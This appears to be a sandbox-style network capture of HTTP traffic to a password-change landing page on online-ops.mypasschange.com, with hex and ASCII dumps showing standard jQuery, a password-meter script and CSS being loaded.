2024-12-27 09:32:23 UTC	10668	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6c 69 62 2f 6a 71 75 65 72 79 2d 31 2e 31 31 2e 31 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 0a 09 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6c 69 62 2f 70 61 73 73 77 6f 72 64 2d 6d 65 74 65 72 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <!DOCTYPE HTML PUBLIC><html><head><meta charset="utf-8"><script src="/static/lib/jquery-1.11.1.min.js" type="text/javascript"></script><script src="/static/lib/password-meter.js" type="text/javascript"></script><link rel="stylesheet" href=

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:23 UTC	617	OUT	GET /static/lib/jquery-1.11.1.min.js HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:23 UTC	373	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:23 GMT Content-Type: application/javascript Content-Length: 95790 Last-Modified: Sun, 30 May 2021 15:57:16 GMT Connection: close ETag: "60b3b5dc-1762e" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:23 UTC	16011	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 Data Ascii: /! jQuery v1.11.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wi
2024-12-27 09:32:23 UTC	16384	IN	Data Raw: 3d 68 28 61 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 29 3b 72 65 74 75 72 6e 20 64 5b 75 5d 3f 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 65 29 7b 76 61 72 20 66 2c 67 3d 64 28 61 2c 6e 75 6c 6c 2c 65 2c 5b 5d 29 2c 68 3d 61 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 68 2d 2d 29 28 66 3d 67 5b 68 5d 29 26 26 28 61 5b 68 5d 3d 21 28 62 5b 68 5d 3d 66 29 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 62 5b 30 5d 3d 61 2c 64 28 62 2c 6e 75 6c 6c 2c 66 2c 63 29 2c 21 63 2e 70 6f 70 28 29 7d 7d 29 2c 68 61 73 3a 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 66 62 28 61 2c 62 29 2e 6c 65 6e 67 74 68 3e 30 7d 7d 29 2c 63 6f 6e 74 61 69 Data Ascii: =h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contai
2024-12-27 09:32:23 UTC	16384	IN	Data Raw: 6a 5b 6b 5d 2e 64 61 74 61 2c 62 29 29 2c 67 3d 6a 5b 6b 5d 2c 65 7c 7c 28 67 2e 64 61 74 61 7c 7c 28 67 2e 64 61 74 61 3d 7b 7d 29 2c 67 3d 67 2e 64 61 74 61 29 2c 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 3d 64 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 28 66 3d 67 5b 62 5d 2c 6e 75 6c 6c 3d 3d 66 26 26 28 66 3d 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 29 29 3a 66 3d 67 2c 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 29 7b 69 66 28 6d 2e 61 63 63 65 70 74 44 61 74 61 28 61 29 29 7b 76 61 72 20 64 2c 65 2c 66 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 67 3d 66 3f 6d 2e 63 61 63 68 65 3a 61 2c 68 3d 66 3f 61 5b 6d 2e 65 78 70 61 6e 64 6f 5d 3a 6d 2e 65 78 70 61 6e 64 6f 3b Data Ascii: j[k].data,b)),g=j[k],e\|\|(g.data\|\|(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;
2024-12-27 09:32:23 UTC	16384	IN	Data Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 3b 72 62 2e 6f 70 74 67 72 6f 75 70 3d 72 62 2e 6f 70 74 69 6f 6e 2c 72 62 2e 74 62 6f 64 79 3d 72 62 2e 74 66 6f 6f 74 3d 72 62 2e 63 6f 6c 67 72 6f 75 70 3d 72 62 2e 63 61 70 74 69 6f 6e 3d 72 62 2e 74 68 65 61 64 2c 72 62 2e 74 68 3d 72 62 2e 74 64 3b 66 75 6e 63 74 69 6f 6e 20 75 62 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 65 3d 30 2c 66 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 21 3d 3d 4b 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 62 7c 7c 22 2a 22 29 3a 74 79 70 65 6f 66 20 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 21 3d 3d 4b 3f 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 62 7c 7c 22 2a Data Ascii: reateElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b\|\|""):typeof a.querySelectorAll!==K?a.querySelectorAll(b\|\|"
2024-12-27 09:32:23 UTC	16384	IN	Data Raw: 6e 6f 64 65 54 79 70 65 26 26 61 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 61 2e 65 6c 65 6d 5b 61 2e 70 72 6f 70 5d 3d 61 2e 6e 6f 77 29 7d 7d 2c 6d 2e 65 61 73 69 6e 67 3d 7b 6c 69 6e 65 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2e 35 2d 4d 61 74 68 2e 63 6f 73 28 61 2a 4d 61 74 68 2e 50 49 29 2f 32 7d 7d 2c 6d 2e 66 78 3d 5a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 2c 6d 2e 66 78 2e 73 74 65 70 3d 7b 7d 3b 76 61 72 20 24 62 2c 5f 62 2c 61 63 3d 2f 5e 28 3f 3a 74 6f 67 67 6c 65 7c 73 68 6f 77 7c 68 69 64 65 29 24 2f 2c 62 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5b 2b 2d 5d 29 3d 7c 29 28 22 2b 53 2b 22 29 28 5b Data Ascii: nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},m.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},m.fx=Zb.prototype.init,m.fx.step={};var $b,_b,ac=/^(?:toggle\|show\|hide)$/,bc=new RegExp("^(?:([+-])=\|)("+S+")([
2024-12-27 09:32:23 UTC	14243	IN	Data Raw: 61 74 61 54 79 70 65 73 3b 77 68 69 6c 65 28 22 2a 22 3d 3d 3d 69 5b 30 5d 29 69 2e 73 68 69 66 74 28 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 61 2e 6d 69 6d 65 54 79 70 65 7c 7c 62 2e 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 29 3b 69 66 28 65 29 66 6f 72 28 67 20 69 6e 20 68 29 69 66 28 68 5b 67 5d 26 26 68 5b 67 5d 2e 74 65 73 74 28 65 29 29 7b 69 2e 75 6e 73 68 69 66 74 28 67 29 3b 62 72 65 61 6b 7d 69 66 28 69 5b 30 5d 69 6e 20 63 29 66 3d 69 5b 30 5d 3b 65 6c 73 65 7b 66 6f 72 28 67 20 69 6e 20 63 29 7b 69 66 28 21 69 5b 30 5d 7c 7c 61 2e 63 6f 6e 76 65 72 74 65 72 73 5b 67 2b 22 20 22 2b 69 5b 30 5d 5d 29 7b 66 3d 67 3b 62 72 65 61 6b 7d 64 7c 7c 28 64 3d 67 29 7d 66 3d 66 7c 7c 64 Data Ascii: ataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType\|\|b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]\|\|a.converters[g+" "+i[0]]){f=g;break}d\|\|(d=g)}f=f\|\|d

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:24 UTC	630	OUT	GET /static/css/landing/landing.css HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:25 UTC	355	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:24 GMT Content-Type: text/css Content-Length: 526 Last-Modified: Sun, 30 May 2021 15:57:14 GMT Connection: close ETag: "60b3b5da-20e" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:25 UTC	526	IN	Data Raw: 23 73 75 63 63 65 73 73 2d 64 69 61 6c 6f 67 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0d 0a 20 20 20 20 74 6f 70 3a 20 32 35 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 3b 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 Data Ascii: #success-dialog { position: absolute; display: none; width: 400px; height: 200px; z-index: 9999; top: 25%; background:white; border: 1px solid black; -webkit-box-shadow:0 0 10px rgba(0,0,0,0.4); -moz-box-s

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:24 UTC	614	OUT	GET /static/lib/password-meter.js HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:25 UTC	372	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:24 GMT Content-Type: application/javascript Content-Length: 36758 Last-Modified: Sun, 30 May 2021 15:57:16 GMT Connection: close ETag: "60b3b5dc-8f96" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:25 UTC	16012	IN	Data Raw: 2f 2a 2a 0d 0a 20 2a 2a 20 20 20 20 4f 72 69 67 69 6e 61 6c 20 46 69 6c 65 3a 20 70 61 73 73 77 6f 72 64 2d 6d 65 74 65 72 2e 6a 73 0d 0a 20 2a 2a 20 20 20 20 43 72 65 61 74 65 64 20 62 79 3a 20 52 65 6e 65 20 53 63 68 77 69 65 74 7a 6b 65 20 28 6d 61 69 6c 40 30 33 31 34 36 66 30 36 2e 6e 65 74 29 0d 0a 20 2a 2a 20 20 20 20 43 72 65 61 74 65 64 20 6f 6e 3a 20 32 30 30 38 2d 31 32 2d 30 31 0d 0a 20 2a 2a 20 20 20 20 4c 61 73 74 20 6d 6f 64 69 66 69 65 64 3a 20 32 30 31 34 2d 30 38 2d 32 30 0d 0a 20 2a 2a 20 20 20 20 56 65 72 73 69 6f 6e 3a 20 32 2e 30 2e 30 0d 0a 20 2a 2a 0d 0a 20 2a 2a 20 20 20 20 54 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 4d 49 54 29 0d 0a 20 2a 2a 20 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: / Original File: password-meter.js Created by: Rene Schwietzke (mail@03146f06.net) Created on: 2008-12-01 Last modified: 2014-08-20 Version: 2.0.0 The MIT License (MIT) ** -----------------------
2024-12-27 09:32:25 UTC	16384	IN	Data Raw: 20 3d 3d 20 31 29 0d 0a 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 52 65 64 75 6e 64 61 6e 63 79 2e 63 6f 75 6e 74 20 3d 20 31 2e 30 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 65 6c 73 65 0d 0a 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 52 65 64 75 6e 64 61 6e 63 79 2e 63 6f 75 6e 74 20 3d 20 30 2e 30 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 74 68 69 73 2e 52 65 64 75 6e 64 61 6e 63 79 2e 63 6f 75 6e 74 20 3d 20 4e 75 6d 62 65 72 28 74 68 69 73 2e 52 65 64 75 6e 64 61 6e 63 79 2e 63 6f 75 6e 74 29 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 52 65 64 75 6e 64 61 6e 63 79 2e 63 6f 75 6e 74 3b 0d 0a 20 20 7d 3b 0d 0a 0d 0a 20 20 2f 2f 20 43 68 65 63 6b 20 66 6f Data Ascii: == 1) { this.Redundancy.count = 1.0; } else { this.Redundancy.count = 0.0; } } this.Redundancy.count = Number(this.Redundancy.count); return this.Redundancy.count; }; // Check fo
2024-12-27 09:32:25 UTC	4362	IN	Data Raw: 73 69 63 52 65 71 75 69 72 65 6d 65 6e 74 73 2e 63 6f 75 6e 74 2b 2b 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2f 2f 20 6e 75 6d 65 72 69 63 73 0d 0a 20 20 20 20 74 68 69 73 2e 4e 75 6d 65 72 69 63 73 2e 73 74 61 74 75 73 20 3d 20 74 68 69 73 2e 64 65 74 65 72 6d 69 6e 65 53 74 61 74 75 73 28 74 68 69 73 2e 4e 75 6d 65 72 69 63 73 2e 63 6f 75 6e 74 20 2d 20 74 68 69 73 2e 4e 75 6d 65 72 69 63 73 2e 6d 69 6e 69 6d 75 6d 29 3b 0d 0a 20 20 20 20 69 66 20 28 74 68 69 73 2e 4e 75 6d 65 72 69 63 73 2e 73 74 61 74 75 73 20 21 3d 20 74 68 69 73 2e 53 54 41 54 55 53 2e 46 41 49 4c 45 44 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 2f 2f 20 72 65 71 75 69 72 65 6d 65 6e 74 20 6d 65 74 0d 0a 20 20 20 20 20 20 74 68 69 73 2e 42 61 73 69 63 52 65 71 75 69 72 Data Ascii: sicRequirements.count++; } // numerics this.Numerics.status = this.determineStatus(this.Numerics.count - this.Numerics.minimum); if (this.Numerics.status != this.STATUS.FAILED) { // requirement met this.BasicRequir

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:25 UTC	382	OUT	GET /static/lib/jquery-1.11.1.min.js HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:26 UTC	373	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:26 GMT Content-Type: application/javascript Content-Length: 95790 Last-Modified: Sun, 30 May 2021 15:57:16 GMT Connection: close ETag: "60b3b5dc-1762e" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:26 UTC	16011	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 Data Ascii: /! jQuery v1.11.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wi
2024-12-27 09:32:26 UTC	16384	IN	Data Raw: 3d 68 28 61 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 29 3b 72 65 74 75 72 6e 20 64 5b 75 5d 3f 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 65 29 7b 76 61 72 20 66 2c 67 3d 64 28 61 2c 6e 75 6c 6c 2c 65 2c 5b 5d 29 2c 68 3d 61 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 68 2d 2d 29 28 66 3d 67 5b 68 5d 29 26 26 28 61 5b 68 5d 3d 21 28 62 5b 68 5d 3d 66 29 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 62 5b 30 5d 3d 61 2c 64 28 62 2c 6e 75 6c 6c 2c 66 2c 63 29 2c 21 63 2e 70 6f 70 28 29 7d 7d 29 2c 68 61 73 3a 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 66 62 28 61 2c 62 29 2e 6c 65 6e 67 74 68 3e 30 7d 7d 29 2c 63 6f 6e 74 61 69 Data Ascii: =h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contai
2024-12-27 09:32:26 UTC	16384	IN	Data Raw: 6a 5b 6b 5d 2e 64 61 74 61 2c 62 29 29 2c 67 3d 6a 5b 6b 5d 2c 65 7c 7c 28 67 2e 64 61 74 61 7c 7c 28 67 2e 64 61 74 61 3d 7b 7d 29 2c 67 3d 67 2e 64 61 74 61 29 2c 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 3d 64 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 28 66 3d 67 5b 62 5d 2c 6e 75 6c 6c 3d 3d 66 26 26 28 66 3d 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 29 29 3a 66 3d 67 2c 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 29 7b 69 66 28 6d 2e 61 63 63 65 70 74 44 61 74 61 28 61 29 29 7b 76 61 72 20 64 2c 65 2c 66 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 67 3d 66 3f 6d 2e 63 61 63 68 65 3a 61 2c 68 3d 66 3f 61 5b 6d 2e 65 78 70 61 6e 64 6f 5d 3a 6d 2e 65 78 70 61 6e 64 6f 3b Data Ascii: j[k].data,b)),g=j[k],e\|\|(g.data\|\|(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;
2024-12-27 09:32:26 UTC	16384	IN	Data Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 3b 72 62 2e 6f 70 74 67 72 6f 75 70 3d 72 62 2e 6f 70 74 69 6f 6e 2c 72 62 2e 74 62 6f 64 79 3d 72 62 2e 74 66 6f 6f 74 3d 72 62 2e 63 6f 6c 67 72 6f 75 70 3d 72 62 2e 63 61 70 74 69 6f 6e 3d 72 62 2e 74 68 65 61 64 2c 72 62 2e 74 68 3d 72 62 2e 74 64 3b 66 75 6e 63 74 69 6f 6e 20 75 62 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 65 3d 30 2c 66 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 21 3d 3d 4b 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 62 7c 7c 22 2a 22 29 3a 74 79 70 65 6f 66 20 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 21 3d 3d 4b 3f 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 62 7c 7c 22 2a Data Ascii: reateElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b\|\|""):typeof a.querySelectorAll!==K?a.querySelectorAll(b\|\|"
2024-12-27 09:32:26 UTC	16384	IN	Data Raw: 6e 6f 64 65 54 79 70 65 26 26 61 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 61 2e 65 6c 65 6d 5b 61 2e 70 72 6f 70 5d 3d 61 2e 6e 6f 77 29 7d 7d 2c 6d 2e 65 61 73 69 6e 67 3d 7b 6c 69 6e 65 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2e 35 2d 4d 61 74 68 2e 63 6f 73 28 61 2a 4d 61 74 68 2e 50 49 29 2f 32 7d 7d 2c 6d 2e 66 78 3d 5a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 2c 6d 2e 66 78 2e 73 74 65 70 3d 7b 7d 3b 76 61 72 20 24 62 2c 5f 62 2c 61 63 3d 2f 5e 28 3f 3a 74 6f 67 67 6c 65 7c 73 68 6f 77 7c 68 69 64 65 29 24 2f 2c 62 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5b 2b 2d 5d 29 3d 7c 29 28 22 2b 53 2b 22 29 28 5b Data Ascii: nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},m.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},m.fx=Zb.prototype.init,m.fx.step={};var $b,_b,ac=/^(?:toggle\|show\|hide)$/,bc=new RegExp("^(?:([+-])=\|)("+S+")([
